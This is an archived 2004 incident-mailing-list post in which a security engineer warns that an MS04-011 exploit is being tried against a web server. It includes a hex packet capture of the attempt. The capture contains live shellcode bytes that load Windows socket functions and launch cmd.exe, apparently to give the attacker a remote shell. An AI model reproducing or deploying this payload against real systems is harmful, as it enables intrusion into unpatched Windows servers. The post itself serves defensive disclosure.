Heads up: Looks like MS04-011 exploit is being tried against www.domain
From: James Riden (j.riden_at_massey.ac.nz)
Date: 04/27/04
- Previous message: Harlan Carvey: "Re: MS04-011, Nessus, and SPAM flood"
- In reply to: Steven Trewick: "Malformed DNS or something odd (or just me)"
- Next in thread: Rob Shein: "RE: Heads up: Looks like MS04-011 exploit is being tried against www.domain"
- Reply: Rob Shein: "RE: Heads up: Looks like MS04-011 exploit is being tried against www.domain"
- Reply: falcon_at_secureconsulting.net: "Re: Heads up: Looks like MS04-011 exploit is being tried againstwww.domain"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: incidents@securityfocus.com Date: Tue, 27 Apr 2004 15:14:29 +1200
Seen as long ago as 25/04/2004. Haven't seen it used against any other
servers here, so it's obviously targetted in some way. Example packet
capture:
000 : 80 62 01 02 BD 00 01 00 01 00 16 8F 82 01 00 00 .b..............
010 : 00 EB 0F 54 48 43 4F 57 4E 5A 49 49 53 21 32 5E ...THCOWNZIIS!2^
020 : BE 98 EB 25 03 E7 3E D8 08 24 02 06 6C 59 6C 59 ...%..>..$..lYlY
030 : F8 1D 9C DE 8C D1 4C 70 D4 03 58 46 57 53 32 5F ......Lp..XFWS2_
040 : 33 32 2E 44 4C 4C 01 EB 05 E8 F9 FF FF FF 5D 83 32.DLL........].
050 : ED 2C 6A 30 59 64 8B 01 8B 40 0C 8B 70 1C AD 8B .,j0Yd...@..p...
060 : 78 08 8D 5F 3C 8B 1B 01 FB 8B 5B 78 01 FB 8B 4B x.._<.....[x...K
070 : 1C 01 F9 8B 53 24 01 FA 53 51 52 8B 5B 20 01 FB ....S$..SQR.[ ..
080 : 31 C9 41 31 C0 99 8B 34 8B 01 FE AC 31 C2 D1 E2 1.A1...4....1...
090 : 84 C0 75 F7 0F B6 45 09 8D 44 45 08 66 39 10 75 ..u...E..DE.f9.u
0a0 : E1 66 31 10 5A 58 5E 56 50 52 2B 4E 10 41 0F B7 .f1.ZX^VPR+N.A..
0b0 : 0C 4A 8B 04 88 01 F8 0F B6 4D 09 89 44 8D D8 FE .J.......M..D...
0c0 : 4D 09 75 BE FE 4D 08 74 17 FE 4D 24 8D 5D 1A 53 M.u..M.t..M$.].S
0d0 : FF D0 89 C7 6A 02 58 88 45 09 80 45 79 0C EB 82 ....j.X.E..Ey...
0e0 : 89 CE 31 DB 53 53 53 53 56 46 56 FF D0 89 C7 55 ..1.SSSSVFV....U
0f0 : 58 66 89 30 6A 10 55 57 FF 55 E0 8D 45 88 50 FF Xf.0j.UW.U..E.P.
100 : 55 E8 55 55 FF 55 EC 8D 44 05 0C 94 53 68 2E 65 U.UU.U..D...Sh.e
110 : 78 65 68 5C 63 6D 64 94 31 D2 8D 45 CC 94 57 57 xeh\cmd.1..E..WW
120 : 57 53 53 FE CA 01 F2 52 94 8D 45 78 50 8D 45 88 WSS....R..ExP.E.
130 : 50 B1 08 53 53 6A 10 FE CE 52 53 53 53 55 FF 55 P..SSj...RSSSU.U
140 : F0 6A FF FF 55 E4 .j..U.
-- James Riden / j.riden@massey.ac.nz / Systems Security Engineer GPG public key available at: http://www.massey.ac.nz/~jriden/ This post does not necessarily represent the views of my employer. --------------------------------------------------------------------------- ----------------------------------------------------------------------------
- Previous message: Harlan Carvey: "Re: MS04-011, Nessus, and SPAM flood"
- In reply to: Steven Trewick: "Malformed DNS or something odd (or just me)"
- Next in thread: Rob Shein: "RE: Heads up: Looks like MS04-011 exploit is being tried against www.domain"
- Reply: Rob Shein: "RE: Heads up: Looks like MS04-011 exploit is being tried against www.domain"
- Reply: falcon_at_secureconsulting.net: "Re: Heads up: Looks like MS04-011 exploit is being tried againstwww.domain"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
